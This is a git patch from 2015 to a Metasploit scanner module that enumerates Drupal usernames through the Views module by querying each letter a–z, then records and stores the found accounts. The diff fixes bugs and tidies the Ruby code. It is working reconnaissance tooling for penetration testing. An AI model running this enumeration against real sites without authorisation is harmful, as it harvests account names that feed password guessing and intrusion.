From ed8f5456a47623f18d86c12c551f485bbae2cba6 Mon Sep 17 00:00:00 2001
From: Roberto Soares <robertoespreto@gmail.com>
Date: Sun, 4 Oct 2015 05:53:54 -0300
Subject: [PATCH] Fix bugs in drupal_views_user_enum.

---
 .../scanner/http/drupal_views_user_enum.rb    | 56 +++++++++----------
 1 file changed, 28 insertions(+), 28 deletions(-)

diff --git a/modules/auxiliary/scanner/http/drupal_views_user_enum.rb b/modules/auxiliary/scanner/http/drupal_views_user_enum.rb
index c78ded7771..a84a998808 100644
--- a/modules/auxiliary/scanner/http/drupal_views_user_enum.rb
+++ b/modules/auxiliary/scanner/http/drupal_views_user_enum.rb
@@ -44,19 +44,21 @@ class Metasploit3 < Msf::Auxiliary
   end
 
   def check_host(ip)
-    res = send_request_cgi({
+    res = send_request_cgi(
       'uri'     => base_uri,
       'method'  => 'GET',
       'headers' => { 'Connection' => 'Close' }
-    }, 25)
+    )
 
-    if not res
+    unless res
       return Exploit::CheckCode::Unknown
-    elsif res and res.body =~ /\<title\>Access denied/
+    end
+
+    if res.body.include?('Access denied')
       # This probably means the Views Module actually isn't installed
-      vprint_error("#{rhost} - Access denied")
+      print_error("#{peer} - Access denied")
       return Exploit::CheckCode::Safe
-    elsif res and res.message != 'OK' or res.body != '[  ]'
+    elsif res.message != 'OK' || res.body != '[  ]'
       return Exploit::CheckCode::Safe
     else
       return Exploit::CheckCode::Appears
@@ -94,59 +96,57 @@ class Metasploit3 < Msf::Auxiliary
       return
     end
 
-    print_status("Begin enumerating users at #{ip}")
+    print_status("Begin enumerating users at #{vhost}")
 
     results = []
     ('a'..'z').each do |l|
       vprint_status("Iterating on letter: #{l}")
 
-      res = send_request_cgi({
-        'uri'     => base_uri+l,
+      res = send_request_cgi(
+        'uri'     => "#{base_uri}#{l}",
         'method'  => 'GET',
         'headers' => { 'Connection' => 'Close' }
-      }, 25)
+      )
 
-      if (res and res.message == "OK")
-        user_list = res.body.scan(/\w+/)
+      if res && res.message == 'OK'
+        begin
+          user_list = JSON.parse(res.body)
+        rescue JSON::ParserError => e
+          elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
+          return []
+        end
         if user_list.empty?
-          vprint_line("\tFound: Nothing")
+          vprint_error("Not found with: #{l}")
         else
-          vprint_line("\tFound: #{user_list.inspect}")
-          results << user_list
+          vprint_good("Found: #{user_list}")
+          results << user_list.flatten.uniq
         end
       else
-        print_error("Unexpected results from server")
+        print_error("#{peer} - Unexpected results from server")
         return
       end
     end
 
-    final_results = results.flatten.uniq
-
-    print_status("Done. " + final_results.length.to_s + " usernames found...")
-
-    final_results.each do |user|
+    print_status("Done. #{results.length} usernames found...")
+    results.flatten.uniq.each do |user|
       print_good("Found User: #{user}")
 
       report_cred(
         ip: Rex::Socket.getaddress(datastore['RHOST']),
         port: datastore['RPORT'],
         user: user,
-        proof: base_uri+l
+        proof: base_uri
       )
     end
 
-    # One username per line
-    final_results = final_results * "\n"
-
+    results = results * "\n"
     p = store_loot(
       'drupal_user',
       'text/plain',
       Rex::Socket.getaddress(datastore['RHOST']),
-      final_results.to_s,
+      results.to_s,
       'drupal_user.txt'
     )
-
     print_status("Usernames stored in: #{p}")
   end
-
 end